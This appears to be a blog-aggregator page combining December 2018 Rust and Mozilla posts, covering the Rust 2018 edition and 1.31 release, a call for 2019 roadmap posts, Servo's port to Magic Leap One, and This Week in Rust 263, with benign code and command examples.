A timeline showing the different channels: beta, Rust 2018, and Rust 2015, with features flowing from beta to the other two. The timeline is surrounded by icons for tooling and for 4 domains: WebAssembly, embedded, networking, and CLI. A red circle surrounds everything except for Rust 2015 and is labeled with Developer Productivity.

But beyond that, it can be hard to explain exactly what Rust 2018 is.

Some people think of it as a new version of the language, which it is… kind of, but not really. I say “not really” because if this is a new version, it doesn’t work like versioning does in other languages.

In most other languages, when a new version of the language comes out, any new features are added to that new version. The previous version doesn’t get new features.

Rust editions are different. This is because of the way the language is evolving. Almost all of the new features are 100% compatible with Rust as it is. They don’t require any breaking changes. That means there’s no reason to limit them to Rust 2018 code. New versions of the compiler will continue to support “Rust 2015 mode”, which is what you get by default.

But sometimes to advance the language, you need to add things like new syntax. And this new syntax can break things in existing code bases.

An example of this is the async/await feature. Rust initially didn’t have the concepts of async and await. But it turns out that these primitives are really helpful. They make it easier to write code that is asynchronous without the code getting unwieldy.

To make it possible to add this feature, we need to add both async and await as keywords. But we also have to be careful that we’re not making old code invalid… code that might’ve used the words async or await as variable names.

So we’re adding the keywords as part of Rust 2018. Even though the feature hasn’t landed yet, the keywords are now reserved. All of the breaking changes needed for the next three years of development (like adding new keywords) are being made in one go, in Rust 1.31.

Timeline with a line connecting Rust 2015 to the start of Rust 2018 at release 1.31.

Even though there are breaking changes in Rust 2018, that doesn’t mean your code will break. Your code will continue compiling even if it has async or await as a variable name. Unless you tell it otherwise, the compiler assumes you want it to compile your code the same way that it has been up to this point.

But as soon as you want to use one of these new, breaking features, you can opt in to Rust 2018 mode. You just run cargo fix, which will tell you if you need to update your code to use the new features. It will also mostly automate the process of making the changes. Then you can add edition=2018 to your Cargo.toml to opt in and use the new features.

This edition specifier in Cargo.toml doesn’t apply to your whole project… it doesn’t apply to your dependencies. It’s scoped to just the one crate. This means you’ll be able to have crate graphs that have Rust 2015 and Rust 2018 interspersed.

Because of this, even once Rust 2018 is out there, it’s mostly going to look the same as Rust 2015. Most changes will land in both Rust 2018 and Rust 2015. Only the handful of features that require breaking changes won’t pass through. 

Rust 2018 isn’t just about changes to the core language, though. In fact, far from it.

Rust 2018 is a push to make Rust developers more productive. Many productivity wins come from things outside of the core language… things like tooling. They also come from focusing on specific use cases and figuring out how Rust can be the most productive language for those use cases.

So you could think of Rust 2018 as the specifier in Cargo.toml that you use to enable the handful of features that require breaking changes…

Timeline with arrows pointing to the couple of Rust 2018 features that aren't passing through to Rust 2015.

Or you can think about it as a moment in time, where Rust becomes one of the most productive languages you can use in many cases — whenever you need performance, light footprint, or high reliability.

In our minds, it’s the second. So let’s look at all that happened outside of the core language. Then we can dive into the core language itself.

Rust for specific use cases

A programming language can’t be productive by itself, in the abstract. It’s productive when put to some use. Because of this, the team knew we didn’t just need to make Rust as a language or Rust tooling better. We also needed to make it easier to use Rust in particular domains.

In some cases, this meant creating a whole new set of tools for a whole new ecosystem.

In other cases, it meant polishing what was already in the ecosystem and documenting it well so that it’s easy to get up and running.

The Rust team formed working groups focused on four domains:

  • WebAssembly
  • Embedded applications
  • Networking
  • Command line tools

WebAssembly

For WebAssembly, the working group needed to create a whole new suite of tools.

Just last year, WebAssembly made it possible to compile languages like Rust to run on the web. Since then, Rust has quickly become the best language for integrating with existing web applications.

Rust logo and JS logo with a heart in between

Rust is a good fit for web development for two reasons:

  1.  Cargo’s crates ecosystem works in the same way that most web app developers are used to. You pull together a bunch of small modules to form a larger application. This means that it’s easy to use Rust just where you need it.
  2. Rust has a light footprint and doesn’t require a runtime. This means that you don’t need to ship down a bunch of code. If you have a tiny module doing lots of heavy computational work, you can introduce a few lines of Rust just to make that run faster.

With the web-sys and js-sys crates, it’s easy to call web APIs like fetch or appendChild from Rust code. And wasm-bindgen makes it easy support high-level data types that WebAssembly doesn’t natively support.

Once you’ve coded up your Rust WebAssembly module, there are tools to make it easy to plug it into the rest of your web application. You can use wasm-pack to run these tools automatically, and push your new module up to npm if you want.

Check out the Rust and WebAssembly book to try it yourself.

What’s next?

Now that Rust 2018 has shipped, the working group is figuring out where to take things next. They’ll be working with the community to determine the next areas of focus.

Embedded

For embedded development, the working group needed to make existing functionality stable.

In theory, Rust has always been a good language for embedded development. It gives embedded developers the modern day tooling that they are sorely lacking, and very convenient high-level language features. All this without sacrificing on resource usage. So Rust seemed like a great fit for embedded development.

However, in practice it was a bit of a wild ride. Necessary features weren’t in the stable channel. Plus, the standard library needed to be tweaked for use on embedded devices. That meant that people had to compile their own version of the Rust core crate (the crate which is used in every Rust app to provide Rust’s basic building blocks — intrinsics and primitives).

On the left: Someone riding a bucking microprocesser chip, saying "Whoa, Rusty!". On the right, someone riding a tame microprocessor chip saing "Good Rusty, nice and steady"

Together, these two things meant developers had to depend on the nightly version of Rust. And since there were no automated tests for micro-controller targets, nightly would often break for these targets.

To fix this, the working group needed to make sure that necessary features were in the stable channel. We also had to add tests to the CI system for micro-controller targets. This means a person adding something for a desktop component won’t break something for an embedded component.

With these changes, embedded development with Rust moves away from the bleeding edge and towards the plateau of productivity.

Check out the Embedded Rust book to try it yourself.

What’s next?

With this year’s push, Rust has really good support for ARM Cortex-M family of microprocessor cores, which are used in a lot of devices. However, there are lots of architectures used on embedded devices, and those aren’t as well supported. Rust needs to expand to have the same level of support for these other architectures.

Networking

For networking, the working group needed to build a core abstraction into the language—async/await. This way, developers can use idiomatic Rust even when the code is asynchronous.

For networking tasks, you often have to wait. For example, you may be waiting for a response to a request. If your code is synchronous, that means the work will stop—the CPU core that is running the code can’t do anything else until the request comes in. But if you code asynchronously, then the function that’s waiting for the response can go on hold while the CPU core takes care of running other functions.

Coding asynchronous Rust is possible even with Rust 2015. And there are lots of upsides to this. On the large scale, for things like server applications, it means that your code can handle many more connections per server. On the small scale, for things like embedded applications that are running on tiny, single threaded CPUs, it means you can make better use of your single thread.

But these upsides came with a major downside—you couldn’t use the borrow checker for that code, and you would have to write unidiomatic (and somewhat confusing) Rust. This is where async/await comes in. It gives the compiler the information it needs to borrow check across asynchronous function calls.

The keywords for async/await were introduced in 1.31, although they aren’t currently backed by an implementation. Much of that work is done, and you can expect the feature to be available in an upcoming release.

What’s next?

Beyond just enabling productive low-level development for networking applications, Rust could enable more productive development at a higher level.

Many servers need to do the same kinds of tasks. They need to parse URLs or work with HTTP. If these were turned into components—common abstractions that could be shared as crates—then it would be easy to plug them together to form all sorts of different servers and frameworks.

To drive the component development process, the Tide framework is providing a test bed for, and eventually example usage of, these components.

Command line tools

For command line tools, the working group needed to bring together smaller, low-level libraries into higher level abstractions, and polish some existing tools.

For some CLI scripts, you really want to use bash. For example, if you just need to call out to other shell tools and pipe data between them, then bash is best.

But Rust is a great fit for a lot of other kinds of CLI tools. For example, it’s great if you are building a complex tool like ripgrep or building a CLI tool on top of an existing library’s functionality.

Rust doesn’t require a runtime and allows you to compile to a single static binary, which makes it easy to distribute. And you get high-level abstractions that you don’t get with other languages like C and C++, so that already makes Rust CLI developers productive.

What did the working group need to make this better still? Even higher-level abstractions.

With these higher-level abstractions, it’s quick and easy to assemble a production ready CLI.

An example of one of these abstractions is the human panic library. Without this library, if your CLI code panics, it probably outputs the entire back trace. But that’s not very helpful for your end users. You could add custom error handling, but that requires effort.

If you use human panic, then the output will be automatically routed to an error dump file. What the user will see is a helpful message suggesting that they report the issue and upload the error dump file.

A cli tool with friendly output from human-panic

The working group also made it easier to get started with CLI development. For example, the confy library will automate a lot of setup for a new CLI tool. It only asks you two things:

  • What’s the name of your application?
  • What are configuration options you want to expose (which you define as a struct that can be serialized and deserialized)?

From that, confy will figure out the rest for you.

What’s next?

The working group abstracted away a lot of different tasks that are common between CLIs. But there’s still more that could be abstracted away. The working group will be making more of these high level libraries, and fixing more paper cuts as they go.

Rust tooling

Tooling icon

When you experience a language, you experience it through tools. This starts with the editor that you use. It continues through every stage of the development process, and through maintenance.

This means that a productive language depends on productive tooling.

Here are some tools (and improvements to Rust’s existing tooling) that were introduced as part of Rust 2018.

IDE support

Of course, productivity hinges on fluidly getting code from your mind to the screen quickly. IDE support is critical to this. To support IDEs, we need tools that can tell the IDE what Rust code actually means — for example, to tell the IDE what strings make sense for code completion.

In the Rust 2018 push, the community focused on the features that IDEs needed. With Rust Language Server and IntelliJ Rust, many IDEs now have fluid Rust support.

Faster compilation

With compilation, faster means more productive. So we’ve made the compiler faster.

Before, when you would compile a Rust crate, the compiler would recompile every single file in the crate. But now, with incremental compilation, the compiler is smart and only recompiles the parts that have changed. This, along with other optimizations, has made the Rust compiler much faster.

rustfmt

Productivity also means not having to fix style nits (and never having to argue over formatting rules).

The rustfmt tool helps with this by automatically reformatting your code using a default code style (which the community reached consensus on). Using rustfmt ensures that all of your Rust code conforms to the same style, like clang format does for C++ and Prettier does for JavaScript.

Clippy

Sometimes it’s nice to have an experienced advisor by your side… giving you tips on best practices as you code. That’s what Clippy does —it reviews your code as you go and tells you how to make that code more idiomatic.

rustfix

But if you have an older code base that uses outmoded idioms, then just getting tips and correcting the code yourself can be tedious. You just want someone to go into your code base and make the corrections.

For these cases, rustfix will automate the process. It will both apply lints from tools like Clippy and update older code to match Rust 2018 idioms.

Changes to Rust itself

These changes in the ecosystem have brought lots of productivity wins. But some productivity issues could only be fixed with changes to the language itself.

As I talked about in the intro, most of the language changes are completely compatible with existing Rust code. These changes are all part of Rust 2018. But because they don’t break any code, they also work in any Rust code… even if that code doesn’t use Rust 2018.

Let’s look at a few of the big language features that were added to all editions. Then we can look at the small list of Rust 2018-specific features.

New language features for all editions

Here’s a small sample of the big new language features that are (or will be) in all language editions.

More precise borrow checking (e.g. Non-Lexical Lifetimes)

One big selling point for Rust is the borrow checker. The borrow checker helps ensure that your code is memory safe. But it has also been a pain point for new Rust developers.

Part of that is learning new concepts. But there was another big part… the borrow checker would sometimes reject code that seemed like it should work, even to those who understood the concepts.

borrow checker telling a programmer that they can't borrow a variable because it's already borrowed

This is because the lifetime of a borrow was assumed to go all the way to the end of its scope — for example, to the end of the function that the variable is in.

This meant that even though the variable was done with the value and wouldn’t try to access it anymore, other variables were still denied access to it until the end of the function.

To fix this, we’ve made the borrow checker smarter. Now it can see when a variable is actually done using a value. If it is done, then it doesn’t block other borrowers from using the data.

borrow checker saying, Oh, now I see

While this is only available in Rust 2018 as of today, it will be available in all editions in the near future. I’ll be writing more about all of this soon.

Procedural macros on stable Rust

Macros in Rust have been around since before Rust 1.0. But with Rust 2018, we’ve made some big improvements, like introducing procedural macros.

With procedural macros, it’s kind of like you can add your own syntax to Rust.

Rust 2018 brings two kinds of procedural macros:

Function-like macros

Function-like macros allow you to have things that look like regular function calls, but that are actually run during compilation. They take in some code and spit out different code, which the compiler then inserts into the binary.

They’ve been around for a while, but what you could do with them was limited. Your macro could only take the input code and run a match statement on it. It didn’t have access to look at all of the tokens in that input code.

But with procedural macros, you get the same input that a parser gets — a token stream. This means can create much more powerful function-like macros.

Attribute-like macros

If you’re familiar with decorators in languages like JavaScript, attribute macros are pretty similar. They allow you to annotate bits of code in Rust that should be preprocessed and turned into something else.

The derive macro does exactly this kind of thing. When you put derive above a struct, the compiler will take that struct in (after it has been parsed as a list of tokens) and fiddle with it. Specifically, it will add a basic implementation of functions from a trait.

More ergonomic borrowing in matching

This change is pretty straight-forward.

Before, if you wanted to borrow something and tried to match on it, you had to add some weird looking syntax:

Old version of the code with &Some(ref s) next to new version with Some(s)

But now, you don’t need the &Some(ref s) anymore. You can just write Some(s), and Rust will figure it out from there.

New features specific to Rust 2018

The smallest part of Rust 2018 are the features specific to it. Here are the small handful of changes that using the Rust 2018 edition unlocks.

Keywords

There are a few keywords that have been added to Rust 2018.

  • try keyword
  • async/await keyword

These features haven’t been fully implemented yet, but the keywords are being added in Rust 1.31. This means we don’t have to introduce new keywords (which would be a breaking change) in the future, once the features behind these keywords are implemented.

The module system

One big pain point for developers learning Rust is the module system. And we could see why. It was hard to reason about how Rust would choose which module to use.

To fix this, we made a few changes to the way paths work in Rust.

For example, if you imported a crate, you could use it in a path at the top level. But if you moved any of the code to a submodule, then it wouldn’t work anymore.

// top level module
extern crate serde;

// this works fine at the top level
impl serde::Serialize for MyType { ... }

mod foo {
  // but it does *not* work in a sub-module
  impl serde::Serialize for OtherType { ... }
}

Another example is the prefix ::, which used to refer to either the crate root or an external crate. It could be hard to tell which.

We’ve made this more explicit. Now, if you want to refer to the crate root, you use the prefix crate:: instead. And this is just one of the path clarity improvements we’ve made.

If you have existing Rust code and you want it to use Rust 2018, you’ll very likely need to update it for these new module paths. But that doesn’t mean that you’ll need to manually update your code. Run cargo fix before you add the edition specifier to Cargo.toml and rustfix will make all the changes for you.

Learn More

Learn all about this edition in the Rust 2018 edition guide.

The post Rust 2018 is here… but what is it? appeared first on Mozilla Hacks - the Web developer blog.

The Rust Programming Language BlogA call for Rust 2019 Roadmap blog posts

It's almost 2019! As such, the Rust team needs to create a roadmap for Rust's development next year. At the highest level, Rust's development process looks like this:

  1. The Rust community blogs about what they'd like to see.
  2. The core team reads these posts, and produces a "roadmap RFC," a proposal for what next year's development looks like.
  3. The RFC is widely discussed, and modified in response to feedback, and eventually accepted.
  4. This RFC becomes a guideline for accepting or postponing RFCs for the next year.

We try to align this with the calendar year, but it doesn't 100% match up, currently. Last year, we had a call for posts on January 3, the roadmap RFC was opened on Jan 29th, and was accepted on March 5th. This year, we're starting a bit earlier, but it's still not going to be accepted before January 1.

We need you

Starting today and running until of January 15, we’d like to ask the community to write blogposts reflecting on Rust in 2018 and proposing goals and directions for Rust in 2019. Like last year, these can take many forms:

  • A post on your personal or company blog
  • A Medium post
  • A GitHub gist
  • Or any other online writing platform you prefer.

We’re looking for posts on many topics:

  • Ideas for community programs
  • Language features
  • Documentation improvements
  • Ecosystem needs
  • Tooling enhancements
  • Or anything else Rust related you hope for in 2019

There's one additional thing this year, however. With the shipping of Rust 2018 today, it's time to think about the next edition. In other words:

  • Rust 2015: Stability
  • Rust 2018: Productivity
  • Rust 2021: ?

We aren't yet committing to an edition in 2021, but that's the current estimate. Each edition has had some sort of theme associated with it. As such, we wouldn't just like to know what you're thinking for Rust in 2019, but also, what you want the theme of Rust 2021 to be. Ideally, suggestions for Rust in 2019 will fit into the overall goal of the next edition, though of course, three years is a lot of time, and so not every single thing must. As Rust matures, we need to start thinking of ever-longer horizons, and how our current plans fit into those eventual plans.

If you're not sure what to write, check out all of the blog posts from last year over at ReadRust. They may give you some inspiration!

Please share these posts with us

You can write up these posts and email them to community@rust-lang.org or tweet them with the hashtag #rust2019.

The Core team will be reading all of the submitted posts and using them to inform the initial roadmap RFC for 2019. Once the RFC is submitted, we’ll open up the normal RFC process, though if you want, you are welcome to write a post and link to it on the GitHub discussion.

We look forward to working with the entire community to make Rust even more wonderful in 2019. Thanks for an awesome 2018!

The Rust Programming Language BlogAnnouncing Rust 1.31 and Rust 2018

The Rust team is happy to announce a new version of Rust, 1.31.0, and "Rust 2018" as well. Rust is a programming language that empowers everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.31.0 is as easy as:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.31.0 on GitHub.

What's in 1.31.0 stable

Rust 1.31 may be the most exciting release since Rust 1.0! Included in this release is the first iteration of "Rust 2018," but there's more than just that! This is going to be a long post, so here's a table of contents:

Rust 2018

We wrote about Rust 2018 first in March, and then in July. For some more background about the why of Rust 2018, please go read those posts; there's a lot to cover in the release announcement, and so we're going to focus on the what here. There's also a post on Mozilla Hacks as well!

Briefly, Rust 2018 is an opportunity to bring all of the work we've been doing over the past three years together, and create a cohesive package. This is more than just language features, it also includes

  • Tooling (IDE support, rustfmt, Clippy)
  • Documentation
  • Domain working groups work
  • A new web site

We'll be covering all of this and more in this post.

Let's create a new project with Cargo:

$ cargo new foo

Here's the contents of Cargo.toml:

[package]
name = "foo"
version = "0.1.0"
authors = ["Your Name <you@example.com>"]
edition = "2018"

[dependencies]

A new key has been added under [package]: edition. Note that it has been set to 2018. You can also set it to 2015, which is the default if the key does not exist.

By using Rust 2018, some new features are unlocked that are not allowed in Rust 2015.

It is important to note that each package can be in either 2015 or 2018 mode, and they work seamlessly together. Your 2018 project can use 2015 dependencies, and a 2015 project can use 2018 dependencies. This ensures that we don't split the ecosystem, and all of these new things are opt-in, preserving compatibility for existing code. Furthermore, when you do choose to migrate Rust 2015 code to Rust 2018, the changes can be made automatically, via cargo fix.

What kind of new features, you may ask? Well, first, features get added to Rust 2015 unless they require some sort of incompatibility with 2015's features. As such, most of the language is available everywhere. You can check out the edition guide to check each feature's minimum rustc version as well as edition requirements. However, there are a few big-ticket features we'd like to mention here: non-lexical lifetimes, and some module system improvements.

Non-lexical lifetimes

If you've been following Rust's development over the past few years, you may have heard the term "NLL" or "non-lexical lifetimes" thrown around. This is jargon, but it has a straightforward translation into simpler terms: the borrow checker has gotten smarter, and now accepts some valid code that it previously rejected. Consider this example:

fn main() {
    let mut x = 5;

    let y = &x;

    let z = &mut x;
}

In older Rust, this is a compile-time error:

error[E0502]: cannot borrow `x` as mutable because it is also borrowed as immutable
 --> src/main.rs:5:18
  |
4 |     let y = &x;
  |              - immutable borrow occurs here
5 |     let z = &mut x;
  |                  ^ mutable borrow occurs here
6 | }
  | - immutable borrow ends here

This is because lifetimes follow "lexical scope"; that is, the borrow from y is considered to be held until y goes out of scope at the end of main, even though we never use y again. This code is fine, but the borrow checker could not handle it.

Today, this code will compile just fine.

What if we did use y, like this for example:

fn main() {
    let mut x = 5;
    let y = &x;
    let z = &mut x;
    
    println!("y: {}", y);
}

Older Rust will give you this error:

error[E0502]: cannot borrow `x` as mutable because it is also borrowed as immutable
 --> src/main.rs:5:18
  |
4 |     let y = &x;
  |              - immutable borrow occurs here
5 |     let z = &mut x;
  |                  ^ mutable borrow occurs here
...
8 | }
  | - immutable borrow ends here

With Rust 2018, this error changes for the better:

error[E0502]: cannot borrow `x` as mutable because it is also borrowed as immutable
 --> src/main.rs:5:13
  |
4 |     let y = &x;
  |             -- immutable borrow occurs here
5 |     let z = &mut x;
  |             ^^^^^^ mutable borrow occurs here
6 |     
7 |     println!("y: {}", y);
  |                       - borrow later used here

Instead of pointing to where y goes out of scope, it shows you where the conflicting borrow occurs. This makes these sorts of errors far easier to debug.

In Rust 1.31, this feature is exclusive to Rust 2018. We plan to backport it to Rust 2015 at a later date.

Module system changes

The module system can be a struggle for people first learning Rust. Everyone has their own things that take time to master, of course, but there's a root cause for why it's so confusing to many: while there are simple and consistent rules defining the module system, their consequences can feel inconsistent, counterintuitive and mysterious.

As such, the 2018 edition of Rust introduces a few changes to how paths work, but they end up simplifying the module system, to make it more clear as to what is going on.

Here's a brief summary:

  • extern crate is no longer needed in almost all circumstances.
  • You can import macros with use, rather than a #[macro_use] attribute.
  • Absolute paths begin with a crate name, where the keyword crate refers to the current crate.
  • A foo.rs and foo/ subdirectory may coexist; mod.rs is no longer needed when placing submodules in a subdirectory.

These may seem like arbitrary new rules when put this way, but the mental model is now significantly simplified overall.

There's a lot of details here, so please read the edition guide for full details.

More lifetime elision rules

Let's talk about a feature that's available in both editions: we've added some additional elision rules for impl blocks and function definitions. Code like this:

impl<'a> Reader for BufReader<'a> {
    // methods go here
}

can now be written like this:

impl Reader for BufReader<'_> {
    // methods go here
}

The '_ lifetime still shows that BufReader takes a parameter, but we don't need to create a name for it anymore.

Lifetimes are still required to be defined in structs. However, we no longer require as much boilerplate as before:

// Rust 2015
struct Ref<'a, T: 'a> {
    field: &'a T
}

// Rust 2018
struct Ref<'a, T> {
    field: &'a T
}

The : 'a is inferred. You can still be explicit if you prefer. We're considering some more options for elision here in the future, but have no concrete plans yet.

const fn

There's several ways to define a function in Rust: a regular function with fn, an unsafe function with unsafe fn, an external function with extern fn. This release adds a new way to qualify a function: const fn. It looks like this:

const fn foo(x: i32) -> i32 {
    x + 1
}

A const fn can be called like a regular function, but it can also be used in any constant context. When it is, it is evaluated at compile time, rather than at run time. As an example:

const SIX: i32 = foo(5);

This will execute foo at compile time, and set SIX to 6.

const fns cannot do everything that normal fns can do; they must have deterministic output. This is important for soundness reasons. Currently, const fns can do a minimal subset of operations. Here's some examples of what you can do:

  • Arithmetic and comparison operators on integers
  • All boolean operators except for && and ||
  • Constructing arrays, structs, enums, and tuples
  • Calls to other const fns
  • Index expressions on arrays and slices
  • Field accesses on structs and tuples
  • Reading from constants (but not statics, not even taking a reference to a static)
  • & and * of references
  • Casts, except for raw pointer to integer casts

We'll be growing the abilities of const fn, but we've decided that this is enough useful stuff to start shipping the feature itself.

For full details, please see the reference.

New tools

The 2018 edition signals a new level of maturity for Rust's tools ecosystem. Cargo, Rustdoc, and Rustup have been crucial tools since 1.0; with the 2018 edition, there is a new generation of tools ready for all users: Clippy, Rustfmt, and IDE support.

Rust's linter, clippy, is now available on stable Rust. You can install it via rustup component add clippy and run it with cargo clippy. Clippy is now considered 1.0, which carries the same lint stability guarantees as rustc. New lints may be added, and lints may be modified to add more functionality, however lints may never be removed (only deprecated). This means that code that compiles under clippy will continue to compile under clippy (provided there are no lints set to error via deny), but may throw new warnings.

Rustfmt is a tool for formatting Rust code. Automatically formatting your code lets you save time and arguments by using the official Rust style. You can install with rustup component add rustfmt and use it with cargo fmt.

This release includes Rustfmt 1.0. From now on we guarantee backwards compatibility for Rustfmt: if you can format your code today, then the formatting will not change in the future (only with the default options). Backwards compatibility means that running Rustfmt on your CI is practical (use cargo fmt -- --check). Try that and 'format on save' in your editor to revolutionize your workflow.

IDE support is one of the most requested tooling features for Rust. There are now multiple, high quality options:

Work on IDE support is not finished, in particular code completion is not up to scratch in the RLS-based editors. However, if you mainly want support for types, documentation, and 'go to def', etc. then you should be happy.

If you have problems installing any of the tools with Rustup, try running rustup self update, and then try again.

Tool lints

In Rust 1.30, we stabilized "tool attributes", like #[rustfmt::skip]. In Rust 1.31, we're stabilizing something similar: "tool lints," like #[allow(clippy::bool_comparison)] These give a namespace to lints, so that it's more clear which tool they're coming from.

If you previously used Clippy's lints, you can migrate like this:

// old
#![cfg_attr(feature = "cargo-clippy", allow(bool_comparison))]

// new
#![allow(clippy::bool_comparison)]

You don't need cfg_attr anymore! You'll also get warnings that can help you update to the new style.

Documentation

Rustdoc has seen a number of improvements this year, and we also shipped a complete re-write of the "The Rust Programming Language." Additionally, you can buy a dead-tree copy from No Starch Press!

We had previously called this the "second edition" of the book, but since it's the first edition in print, that was confusing. We also want to periodically update the print edition as well. In the end, after many discussions with No Starch, we're going to be updating the book on the website with each release, and No Starch will periodically pull in our changes and print them. The book has been selling quite well so far, raising money for Black Girls Code.

You can find the new TRPL here.

Domain working groups

We announced the formation of four working groups this year:

  • Network services
  • Command-line applications
  • WebAssembly
  • Embedded devices

Each of these groups has been working very hard on a number of things to make Rust awesome in each of these domains. Some highlights:

  • Network services has been shaking out the Futures interface, and async/await on top of it. This hasn't shipped yet, but we're close!
  • The CLI working group has been working on libraries and documentation for making awesome command-line applications
  • The WebAssembly group has been shipping a ton of world-class tooling for using Rust with wasm.
  • Embedded devices has gotten ARM development working on stable Rust!

You can find out more about this work on the new website!

New Website

Last week we announced a new iteration of the web site. It's now been promoted to rust-lang.org itself!

There's still a ton of work to do, but we're proud of the year of work that it took by many people to get it shipped.

Library stabilizations

A bunch of From implementations have been added:

  • u8 now implements From<NonZeroU8>, and likewise for the other numeric types and their NonZero equivalents
  • Option<&T> implements From<&Option<T>>, and likewise for &mut

Additionally, these functions have been stabilized:

See the detailed release notes for more.

Cargo features

Cargo will now download packages in parallel using HTTP/2.

Additionally, now that extern crate is not usually required, it would be jarring to do extern crate foo as bar; to rename a crate. As such, you can do so in your Cargo.toml, like this:

[dependencies]
baz = { version = "0.1", package = "foo" }

or, the equivalent

[dependencies.baz]
version = "0.1"
package = "foo"

Now, the foo package will be able to be used via baz in your code.

See the detailed release notes for more.

Contributors to 1.31.0

At the end of release posts, we normally thank the people who contributed to this release. But for this release, more so than others, this list does not truly capture the amount of work and the number of people who have contributed. Each release is only six weeks, but this release is the culmination of three years of effort, in countless repositories, by numerous people. It's been a pleasure to work with you all, and we look forward to continuing to grow in the next three years.

The Servo BlogExperience porting Servo to the Magic Leap One

Introduction

We now have nightly releases of Servo for the Magic Leap One augmented reality headset. You can head over to https://download.servo.org/, install the application, and browse the web in a virtual browser.

Magic Leap Servo

This is a developer preview release, designed for as a testbed for future products, and as a venue for experimenting with UI design. What should the web look like in augmented reality? We hope to use Servo to find out!

We are providing these nightly snapshots to encourage other developers to experiment with AR web experiences. There are still many missing features, such as immersive or 3D content, many types of user input, media, or a stable embedding API. We hope you forgive the rough edges.

This blog post will describe the experience of porting Servo to a new architecture, and is intended for system developers.

Magic Leap under the hood

The Magic Leap software development kit (SDK) is based on commonly-used open-source technologies. In particular, it uses the clang compiler and the gcc toolchain for support tools such as ld, objcopy, ranlib and friends.

The architecture is 64-bit ARM, using the same application binary interface as Android. Together these give the target as being aarch64-linux-android, the same as for many 64-bit Android devices. Unlike Android, Magic Leap applications are native programs, and do not require a Java Native Interface (JNI) to the OS.

Magic Leap provides a lot of support for developing AR applications, in the form of the Lumin Runtime APIs, which include 3D scene descriptions, UI elements, input events including device placement and orientation in 3D space, and rendering to displays which provide users with 3D virtual visual and audio environments that interact with the world around them.

The Magic Leap and Lumin Runtime SDKs are available from https://creator.magicleap.com/ for Mac and Windows platforms.

Building the Servo library

The Magic Leap library is built using ./mach build --magicleap, which under the hood calls cargo build --target=aarch64-linux-android. For most of the Servo library and its dependencies, this just works, but there are a couple of corner cases: C/C++ libraries and crates with special treatment for Android.

Some of Servo’s dependencies are crates which link against C/C++ libraries, notably openssl-sys and mozjs-sys. Each of these libraries uses slightly different build environments (such as Make, CMake or Autoconf, often with custom build scripts). The challenge for software like Servo that uses many such libraries is to find a configuration which will work for all the dependencies. This comes down to finding the right settings for environment variables such as $CFLAGS, and is complicated by cross-compiling the libraries which often means ensuring that the Magic Leap libraries are included, not the host libraries.

The other main source of issues with the build is that since Magic Leap uses the same ABI as Android, its target is aarch64-linux-android, which is the same as for 64-bit ARM Android devices. As a result, many crates which need special treatment for Android (for example for JNI or to use libandroid) will treat the Magic Leap build as an Android build rather than a Linux build. Some care is needed to undo all of this special treatment. For example, the build scripts of Servo, SpiderMonkey and OpenSSL all contain code to guess the directory layout of the Android SDK, which needs to be undone when building for Magic Leap.

Debugging in vscode

One thing that just worked turned out to be debugging Rust code on the Magic Leap device. Magic Leap supports the Visual Studio Code IDE, and remote debugging of code running natively. It was great to see the debugging working out of the box for Rust code as well as it did for C++.

Building the Magic Leap application

The first release of Servo for Magic Leap comes with a rudimentary application for browsing 2D web content. This is missing many features, such as immersive 3D content, audio or video media, or user input by anything other than the controller.

Magic Leap applications come in two flavors: universe applications, which are immersive experiences that have complete control over the device, and landscape applications, which co-exist and present the user with a blended experience where each application presents part of a virtual scene. Currently, Servo is a landscape application, though we expect to add a universe application for immersive web content.

Landscape applications can be designed using the Lumin Runtime Editor, which gives a visual presentation of the various UI components in the scene graph.

Lumin Runtime Editor

The most important object in Servo’s scene graph is the content node, since it is a Quad that can contain a 2D resource. One of the kinds of resource that a Quad can contain is an EGL context, that Servo uses to render web content. The runtime editor generates C++ code that can be included in an application to render and access the scene graph; Servo uses this to access the content node, and the EGL context it contains.

The other hooks that the Magic Leap Servo application uses are for events such as moving the laser pointer, which are mapped to mouse events, a heartbeat for animations or other effects which must be performed on the main thread, and a logger which bridges Rust’s logging API to Lumin’s.

The Magic Leap application is built each night by Servo’s CI system, using the Mac builders since there is no Linux SDK for Magic Leap. This builds the Servo library, and packages it is a Magic Leap application, which is hosted on S3 and linked to from the Servo download page.

Summary

The pull request that added Magic Leap support to Servo is https://github.com/servo/servo/pull/21985 which adds about 1600 lines to Servo, mostly in the build scripts and the Magic Leap application. Work on the Magic Leap port of Servo started in early September 2018, and the pull request was merged at the end of October, so took about two person-months.

Much of the port was straightforward, due to the maturity of the Rust cross-compilation and build tools, and the use of common open-source technologies in the Magic Leap platform. Lumin OS contains many innovative features in its treatment of blending physical and virtual 3D environments, but it is built on a solid open-source foundation, which makes porting a complex application like Servo relatively straightforward.

Servo is now making its first steps onto the Magic Leap One, and is available for download and experimentation. Come try it out, and help us design the immersive web!

This Week In RustThis Week in Rust 263

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is cargo-call-stack, a cargo subcommand for whole-program call stack analysis. Thanks to Jorge Aparicio for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

254 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Asia Pacific
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

The bug I did not have

– /u/pacman82's reddit post title

Thanks to Felix for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Cameron KaiserEdge gets Chrome-plated, and we're all worse off

